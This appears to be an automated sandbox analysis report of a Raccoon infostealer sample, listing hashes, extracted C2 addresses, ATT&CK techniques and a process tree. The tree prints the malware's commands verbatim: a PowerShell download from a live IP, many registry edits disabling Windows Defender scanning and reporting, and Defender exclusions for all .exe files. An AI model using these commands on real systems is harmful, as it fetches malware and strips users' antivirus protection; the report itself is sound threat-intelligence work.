raccoon | 79ba4f51061dc9ddd3f87739de5f1fea765695f17f3ca05e9bcf8398e5e08863

Analysis

max time kernel
147s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
27-09-2022 00:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0bd42b1d43c4df140cde9354d078f527.exe
Size

4.5MB
MD5

0bd42b1d43c4df140cde9354d078f527
SHA1

22dfa323960c4a7bdf499e169a4a060c0c58afa6
SHA256

79ba4f51061dc9ddd3f87739de5f1fea765695f17f3ca05e9bcf8398e5e08863
SHA512

d68467de55488d5274f00023952926cebe13caf9504d3c6b2c61532e9f9d739c79652a79e5422b333f4ff4e790d22eab8df33e6aca2dc66ee3e21f3e2703ac9a
SSDEEP

98304:nkLlEy5jWOOfZhed1GQqCVjHjrGxu1xZ73Oe9WX:clHWEzVjHQQj73OmWX

Score

10^/10

raccoon 9b19cf60d9bdf65b8a2495aa965456c3 discovery evasion spyware stealer themida trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://80.92.205.35/hfile.bin

Extracted

Family

raccoon

Botnet

9b19cf60d9bdf65b8a2495aa965456c3

http://94.131.107.206

rc4.plain

Signatures

Modifies Windows Defender notification settings 3 TTPs 2 IoCs

evasion trojan

Modify Existing Service

T1031

Modify Registry

T1112

Disabling Security Tools

T1089

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1"	reg.exe

Raccoon
Raccoon is an infostealer written in C++ and first seen in 2019.
stealer raccoon
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

l862lxO0.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ l862lxO0.exe
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

19 2572 powershell.exe
Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

MBSetup.exe

description ioc process

File created C:\Windows\SysWOW64\drivers\mbamtestfile.dat MBSetup.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	l862lxO0.exe

flow	pid	process
19	2572	powershell.exe

description	ioc	process
File created	C:\Windows\SysWOW64\drivers\mbamtestfile.dat	MBSetup.exe

Executes dropped EXE 20 IoCs

Processes:

0bd42b1d43c4df140cde9354d078f527.tmpMBSetup.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exelrPBx4qjVQLL.exexL8V3I28.exeP8EqOAJx.exel862lxO0.exe

pid	process
5108	0bd42b1d43c4df140cde9354d078f527.tmp
5080	MBSetup.exe
3196	7za.exe
3748	7za.exe
2028	7za.exe
548	7za.exe
2388	7za.exe
4960	7za.exe
1132	7za.exe
2024	7za.exe
2572	7za.exe
2480	7za.exe
3504	7za.exe
1404	7za.exe
3260	7za.exe
4288	7za.exe
4208	lrPBx4qjVQLL.exe
4420	xL8V3I28.exe
1420	P8EqOAJx.exe
1600	l862lxO0.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

l862lxO0.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	l862lxO0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	l862lxO0.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe0bd42b1d43c4df140cde9354d078f527.tmpcmd.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	0bd42b1d43c4df140cde9354d078f527.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	cmd.exe

Loads dropped DLL 4 IoCs

Processes:

0bd42b1d43c4df140cde9354d078f527.tmpInstallUtil.exe

pid process

5108 0bd42b1d43c4df140cde9354d078f527.tmp
624 InstallUtil.exe
624 InstallUtil.exe
624 InstallUtil.exe

Themida packer 2 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\l862lxO0.exe	themida
C:\Users\Admin\AppData\Local\Temp\l862lxO0.exe	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

l862lxO0.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA l862lxO0.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

lrPBx4qjVQLL.exe

description pid process target process

PID 4208 set thread context of 624 4208 lrPBx4qjVQLL.exe InstallUtil.exe
Drops file in Program Files directory 1 IoCs

Processes:

MBSetup.exe

description ioc process

File created C:\Program Files (x86)\mbamtestfile.dat MBSetup.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Modifies registry class 1 IoCs

Processes:

cmd.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings cmd.exe
Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXE

pid process

4116 PING.EXE
3784 PING.EXE
4016 PING.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	l862lxO0.exe

description	pid	process	target process
PID 4208 set thread context of 624	4208	lrPBx4qjVQLL.exe	InstallUtil.exe

description	ioc	process
File created	C:\Program Files (x86)\mbamtestfile.dat	MBSetup.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	cmd.exe

pid	process
4116	PING.EXE
3784	PING.EXE
4016	PING.EXE

Suspicious behavior: EnumeratesProcesses 32 IoCs

Processes:

0bd42b1d43c4df140cde9354d078f527.tmppowershell.exepowershell.exepowershell.exelrPBx4qjVQLL.exeP8EqOAJx.exexL8V3I28.exe

pid	process
5108	0bd42b1d43c4df140cde9354d078f527.tmp
5108	0bd42b1d43c4df140cde9354d078f527.tmp
2572	powershell.exe
2572	powershell.exe
4068	powershell.exe
4068	powershell.exe
5040	powershell.exe
5040	powershell.exe
4208	lrPBx4qjVQLL.exe
4208	lrPBx4qjVQLL.exe
4208	lrPBx4qjVQLL.exe
4208	lrPBx4qjVQLL.exe
4208	lrPBx4qjVQLL.exe
4208	lrPBx4qjVQLL.exe
4208	lrPBx4qjVQLL.exe
4208	lrPBx4qjVQLL.exe
4208	lrPBx4qjVQLL.exe
4208	lrPBx4qjVQLL.exe
1420	P8EqOAJx.exe
1420	P8EqOAJx.exe
1420	P8EqOAJx.exe
1420	P8EqOAJx.exe
4420	xL8V3I28.exe
4420	xL8V3I28.exe
4420	xL8V3I28.exe
4420	xL8V3I28.exe
4420	xL8V3I28.exe
4420	xL8V3I28.exe
4420	xL8V3I28.exe
4420	xL8V3I28.exe
4420	xL8V3I28.exe
4420	xL8V3I28.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exeP8EqOAJx.exe

description	pid	process
Token: SeDebugPrivilege	2572	powershell.exe
Token: SeDebugPrivilege	4068	powershell.exe
Token: SeDebugPrivilege	5040	powershell.exe
Token: SeDebugPrivilege	1420	P8EqOAJx.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

0bd42b1d43c4df140cde9354d078f527.tmp

pid process

5108 0bd42b1d43c4df140cde9354d078f527.tmp

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

0bd42b1d43c4df140cde9354d078f527.exe0bd42b1d43c4df140cde9354d078f527.tmpcmd.exeWScript.execmd.exe

description	pid	process	target process
PID 676 wrote to memory of 5108	676	0bd42b1d43c4df140cde9354d078f527.exe	0bd42b1d43c4df140cde9354d078f527.tmp
PID 676 wrote to memory of 5108	676	0bd42b1d43c4df140cde9354d078f527.exe	0bd42b1d43c4df140cde9354d078f527.tmp
PID 676 wrote to memory of 5108	676	0bd42b1d43c4df140cde9354d078f527.exe	0bd42b1d43c4df140cde9354d078f527.tmp
PID 5108 wrote to memory of 5080	5108	0bd42b1d43c4df140cde9354d078f527.tmp	MBSetup.exe
PID 5108 wrote to memory of 5080	5108	0bd42b1d43c4df140cde9354d078f527.tmp	MBSetup.exe
PID 5108 wrote to memory of 5080	5108	0bd42b1d43c4df140cde9354d078f527.tmp	MBSetup.exe
PID 5108 wrote to memory of 3820	5108	0bd42b1d43c4df140cde9354d078f527.tmp	cmd.exe
PID 5108 wrote to memory of 3820	5108	0bd42b1d43c4df140cde9354d078f527.tmp	cmd.exe
PID 5108 wrote to memory of 3820	5108	0bd42b1d43c4df140cde9354d078f527.tmp	cmd.exe
PID 5108 wrote to memory of 3196	5108	0bd42b1d43c4df140cde9354d078f527.tmp	7za.exe
PID 5108 wrote to memory of 3196	5108	0bd42b1d43c4df140cde9354d078f527.tmp	7za.exe
PID 5108 wrote to memory of 3196	5108	0bd42b1d43c4df140cde9354d078f527.tmp	7za.exe
PID 3820 wrote to memory of 2572	3820	cmd.exe	powershell.exe
PID 3820 wrote to memory of 2572	3820	cmd.exe	powershell.exe
PID 3820 wrote to memory of 2572	3820	cmd.exe	powershell.exe
PID 3820 wrote to memory of 3748	3820	cmd.exe	7za.exe
PID 3820 wrote to memory of 3748	3820	cmd.exe	7za.exe
PID 3820 wrote to memory of 3748	3820	cmd.exe	7za.exe
PID 3820 wrote to memory of 4116	3820	cmd.exe	PING.EXE
PID 3820 wrote to memory of 4116	3820	cmd.exe	PING.EXE
PID 3820 wrote to memory of 4116	3820	cmd.exe	PING.EXE
PID 3820 wrote to memory of 4428	3820	cmd.exe	WScript.exe
PID 3820 wrote to memory of 4428	3820	cmd.exe	WScript.exe
PID 3820 wrote to memory of 4428	3820	cmd.exe	WScript.exe
PID 4428 wrote to memory of 2436	4428	WScript.exe	cmd.exe
PID 4428 wrote to memory of 2436	4428	WScript.exe	cmd.exe
PID 4428 wrote to memory of 2436	4428	WScript.exe	cmd.exe
PID 2436 wrote to memory of 1836	2436	cmd.exe	reg.exe
PID 2436 wrote to memory of 1836	2436	cmd.exe	reg.exe
PID 2436 wrote to memory of 1836	2436	cmd.exe	reg.exe
PID 2436 wrote to memory of 3132	2436	cmd.exe	reg.exe
PID 2436 wrote to memory of 3132	2436	cmd.exe	reg.exe
PID 2436 wrote to memory of 3132	2436	cmd.exe	reg.exe
PID 2436 wrote to memory of 4576	2436	cmd.exe	reg.exe
PID 2436 wrote to memory of 4576	2436	cmd.exe	reg.exe
PID 2436 wrote to memory of 4576	2436	cmd.exe	reg.exe
PID 2436 wrote to memory of 4772	2436	cmd.exe	reg.exe
PID 2436 wrote to memory of 4772	2436	cmd.exe	reg.exe
PID 2436 wrote to memory of 4772	2436	cmd.exe	reg.exe
PID 2436 wrote to memory of 4548	2436	cmd.exe	reg.exe
PID 2436 wrote to memory of 4548	2436	cmd.exe	reg.exe
PID 2436 wrote to memory of 4548	2436	cmd.exe	reg.exe
PID 2436 wrote to memory of 4036	2436	cmd.exe	reg.exe
PID 2436 wrote to memory of 4036	2436	cmd.exe	reg.exe
PID 2436 wrote to memory of 4036	2436	cmd.exe	reg.exe
PID 2436 wrote to memory of 3788	2436	cmd.exe	reg.exe
PID 2436 wrote to memory of 3788	2436	cmd.exe	reg.exe
PID 2436 wrote to memory of 3788	2436	cmd.exe	reg.exe
PID 2436 wrote to memory of 1276	2436	cmd.exe	reg.exe
PID 2436 wrote to memory of 1276	2436	cmd.exe	reg.exe
PID 2436 wrote to memory of 1276	2436	cmd.exe	reg.exe
PID 2436 wrote to memory of 1516	2436	cmd.exe	reg.exe
PID 2436 wrote to memory of 1516	2436	cmd.exe	reg.exe
PID 2436 wrote to memory of 1516	2436	cmd.exe	reg.exe
PID 2436 wrote to memory of 1548	2436	cmd.exe	reg.exe
PID 2436 wrote to memory of 1548	2436	cmd.exe	reg.exe
PID 2436 wrote to memory of 1548	2436	cmd.exe	reg.exe
PID 2436 wrote to memory of 1508	2436	cmd.exe	reg.exe
PID 2436 wrote to memory of 1508	2436	cmd.exe	reg.exe
PID 2436 wrote to memory of 1508	2436	cmd.exe	reg.exe
PID 2436 wrote to memory of 3216	2436	cmd.exe	reg.exe
PID 2436 wrote to memory of 3216	2436	cmd.exe	reg.exe
PID 2436 wrote to memory of 3216	2436	cmd.exe	reg.exe
PID 2436 wrote to memory of 372	2436	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\0bd42b1d43c4df140cde9354d078f527.exe
"C:\Users\Admin\AppData\Local\Temp\0bd42b1d43c4df140cde9354d078f527.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:676

C:\Users\Admin\AppData\Local\Temp\is-CCST8.tmp\0bd42b1d43c4df140cde9354d078f527.tmp
"C:\Users\Admin\AppData\Local\Temp\is-CCST8.tmp\0bd42b1d43c4df140cde9354d078f527.tmp" /SL5="$501EC,3757537,956928,C:\Users\Admin\AppData\Local\Temp\0bd42b1d43c4df140cde9354d078f527.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:5108

C:\Users\Admin\AppData\Local\Temp\is-L4D20.tmp\MBSetup.exe
"C:\Users\Admin\AppData\Local\Temp\is-L4D20.tmp\MBSetup.exe"
3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
PID:5080

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\SurfaceReduction\main.bat" "
3⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3820

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy bypass -noprofile -command "(New-Object System.Net.WebClient).DownloadFile('http://80.92.205.35/hfile.bin', 'hfile.bin')";
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2572

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe x -y -p10619mlgrAGP7211mlgrAGP24753 "*.zip"
4⤵
- Executes dropped EXE
PID:3748

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 10
4⤵
- Runs ping.exe
PID:4116

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\SurfaceReduction\ControlSet003.vbs"
4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4428

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\SurfaceReduction\ControlSet001_obf.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:2436

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "AvgCPULoadFactor" /t reg_DWORD /d "10" /f
6⤵
PID:1836

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableArchiveScanning" /t reg_DWORD /d "1" /f
6⤵
PID:3132

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupFullScan" /t reg_DWORD /d "1" /f
6⤵
PID:4576

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupQuickScan" /t reg_DWORD /d "1" /f
6⤵
PID:4772

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRemovableDriveScanning" /t reg_DWORD /d "1" /f
6⤵
PID:4548

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRestorePoint" /t reg_DWORD /d "1" /f
6⤵
PID:4036

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningMappedNetworkDrivesForFullScan" /t reg_DWORD /d "1" /f
6⤵
PID:3788

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningNetworkFiles" /t reg_DWORD /d "1" /f
6⤵
PID:1276

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "PurgeItemsAfterDelay" /t reg_DWORD /d 0 /f
6⤵
PID:1516

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleDay" /t reg_DWORD /d 8 /f
6⤵
PID:1548

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleTime" /t reg_DWORD /d 0 /f
6⤵
PID:1508

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanOnlyIfIdle" /t reg_DWORD /d 0 /f
6⤵
PID:3216

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanParameters" /t reg_DWORD /d 0 /f
6⤵
PID:372

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t reg_DWORD /d "1" /f
6⤵
PID:5048

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t reg_DWORD /d "0" /f
6⤵
PID:1232

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReportingLocation" /t reg_MULTI_SZ /d "0" /f
6⤵
PID:1696

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t reg_DWORD /d "2" /f
6⤵
PID:2000

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "LocalSettingOverrideSpynetReporting" /t reg_DWORD /d 1 /f
6⤵
PID:1840

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t reg_DWORD /d "1" /f
6⤵
PID:4056

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f
6⤵
- Modifies Windows Defender notification settings
PID:4216

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SurfaceReduction"
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4068

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionExtension ".exe"
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5040

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\SurfaceReduction\compil32_obf.bat" "
5⤵
PID:1456

C:\Windows\SysWOW64\mode.com
mode 65,10
6⤵
PID:732

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e file.zip -p9178UTuitA24715UTuitA26909 -oextracted
6⤵
- Executes dropped EXE
PID:2028

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_11.zip -oextracted
6⤵
- Executes dropped EXE
PID:548

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_10.zip -oextracted
6⤵
- Executes dropped EXE
PID:2388

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_9.zip -oextracted
6⤵
- Executes dropped EXE
PID:4960

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_8.zip -oextracted
6⤵
- Executes dropped EXE
PID:1132

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_7.zip -oextracted
6⤵
- Executes dropped EXE
PID:2024

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_6.zip -oextracted
6⤵
- Executes dropped EXE
PID:2572

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_5.zip -oextracted
6⤵
- Executes dropped EXE
PID:2480

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_4.zip -oextracted
6⤵
- Executes dropped EXE
PID:3504

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_3.zip -oextracted
6⤵
- Executes dropped EXE
PID:1404

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_2.zip -oextracted
6⤵
- Executes dropped EXE
PID:3260

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_1.zip -oextracted
6⤵
- Executes dropped EXE
PID:4288

C:\ProgramData\SurfaceReduction\lrPBx4qjVQLL.exe
"lrPBx4qjVQLL.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4208

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
7⤵
- Loads dropped DLL
PID:624

C:\Users\Admin\AppData\Roaming\xL8V3I28.exe
"C:\Users\Admin\AppData\Roaming\xL8V3I28.exe"
8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4420

C:\Users\Admin\AppData\Roaming\P8EqOAJx.exe
"C:\Users\Admin\AppData\Roaming\P8EqOAJx.exe"
8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1420

C:\Users\Admin\AppData\Roaming\P8EqOAJx.exe
"C:\Users\Admin\AppData\Roaming\P8EqOAJx.exe"
9⤵
PID:4444

C:\Users\Admin\AppData\Local\Temp\l862lxO0.exe
"C:\Users\Admin\AppData\Local\Temp\l862lxO0.exe"
8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:1600

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\SurfaceReduction\ControlSet002.bat" "
5⤵
PID:3544

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 5
6⤵
- Runs ping.exe
PID:3784

C:\Windows\SysWOW64\cmd.exe
cmd /c rd /q /s "C:\ProgramData\SurfaceReduction\"
6⤵
PID:2244

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
4⤵
- Runs ping.exe
PID:4016

C:\ProgramData\SurfaceReduction\7za.exe
"C:\ProgramData\SurfaceReduction\7za.exe" x "C:\ProgramData\SurfaceReduction\keys.zip" -o"C:\Users\Public\Desktop\" * -r -aoa
3⤵
- Executes dropped EXE
PID:3196

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40
